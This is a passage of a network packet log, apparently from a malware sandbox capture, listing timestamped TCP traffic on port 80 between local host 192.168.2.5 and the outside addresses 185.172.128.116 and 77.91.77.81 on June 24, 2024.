Jun 24, 2024 00:10:22.372020006 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.372047901 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.372061014 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.372073889 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.372112036 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.372117043 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.372128010 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.372138023 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.372167110 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.372195005 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.372216940 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.372227907 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.372239113 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.372248888 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.372267008 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.372292995 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.372293949 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.372342110 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.373508930 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.373518944 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.373528004 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.373558998 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.373569965 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.373570919 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.373580933 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.373619080 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.373646021 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.373653889 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.373677015 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.373712063 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.373744011 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.374495029 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.374537945 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.374547958 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.374552011 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.374609947 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.374619007 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.374629974 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.374639034 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.374675989 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.374692917 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.374701023 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.374738932 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.397136927 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397162914 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397171974 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397186995 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.397219896 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.397223949 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397233963 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397244930 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397255898 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397269011 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.397299051 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.397367954 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397377968 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397392988 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397408962 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.397443056 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.397464037 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397475958 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397485971 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397504091 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.397541046 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.397552013 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397562027 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397583961 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397593975 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397603035 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.397629023 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.397644997 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.397691011 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397701979 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397711992 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397722006 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397732973 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397741079 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.397773981 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.397783995 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397830963 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.397901058 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397912025 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397921085 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397931099 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397941113 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.397943020 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397953033 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397964001 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.397984028 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.398020983 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.398025036 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.398065090 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.398509026 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.398550034 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.398612976 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.398622990 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.398654938 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.398675919 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.398739100 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.398750067 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.398760080 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.398768902 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.398777962 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.398780107 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.398824930 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.399681091 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.399692059 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.399702072 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.399724960 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.399755001 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.399763107 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.399765968 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.399775982 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.399786949 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.399796009 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.399795055 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.399852991 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.399996996 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400007010 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400017977 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400027990 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400036097 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.400042057 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400067091 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400077105 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400085926 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.400089979 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400101900 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400111914 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400125980 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.400151968 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.400265932 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400275946 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400288105 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400296926 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400305986 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400315046 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.400331974 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.400377035 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.400732040 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400772095 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.400783062 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400794029 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400825977 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.400862932 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400873899 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400882959 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400893927 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400902987 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.400943041 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.400948048 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.400989056 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.401011944 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401022911 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401031971 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401055098 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.401057005 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401068926 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401077986 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401087999 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401109934 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.401139021 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.401216030 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401226044 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401258945 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.401268959 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401279926 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401307106 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.401343107 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.401371002 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401381969 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401391983 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401401997 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401407957 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.401413918 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401453018 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.401617050 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401628017 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401644945 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401654959 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401663065 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.401668072 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401678085 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401689053 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401699066 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401710033 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401715040 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.401745081 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.401772976 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401813984 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.401850939 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401859999 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401870966 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401881933 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.401890993 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.401905060 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.401937962 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.414720058 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.414767027 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.414769888 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.414781094 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.414813995 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.414851904 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.414863110 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.414872885 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.414884090 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.414892912 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.414896965 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.414940119 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.416800022 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.416841984 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.416845083 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.416855097 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.416891098 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.416920900 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.416930914 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.416940928 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.416973114 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.416987896 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.417011023 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.417016983 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.417032003 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.417054892 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.417109966 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.417114019 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.417119026 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.417128086 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.417139053 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.417150021 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.417160988 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.417172909 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.417223930 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.417232037 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.417242050 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.417253017 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.417304039 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.441899061 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.441931009 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.441941977 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.441982031 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.442003965 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.442014933 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.442025900 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.442038059 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.442045927 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.442047119 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.442090034 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.442090988 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.442141056 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.442152977 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.442162991 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.442192078 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.442249060 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.442326069 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.442337990 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.442348003 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.442358971 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.442369938 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.442382097 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.442383051 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.442383051 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.442394972 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.442406893 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.442406893 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.442428112 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.442456961 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.442514896 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.442527056 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.442565918 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.442565918 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.446156979 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446206093 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446218967 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446219921 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.446254015 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.446285009 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.446309090 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446320057 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446331024 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446342945 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446355104 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.446388006 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.446417093 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.446527004 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446574926 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.446599007 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446609974 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446640968 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.446672916 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.446718931 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446763992 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.446801901 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446813107 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446847916 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446854115 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.446854115 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.446891069 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.446902990 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446914911 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446949959 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446955919 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.446955919 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.446959972 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446973085 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.446988106 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447009087 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447027922 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447041035 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447046995 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447052002 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447065115 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447071075 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447076082 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447098017 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447098017 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447129965 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447154999 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447165966 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447176933 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447187901 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447208881 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447208881 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447242975 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447284937 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447297096 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447303057 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447310925 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447340012 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447376013 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447402954 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447436094 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447448015 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447448015 CEST	49726	80	192.168.2.5	185.172.128.116
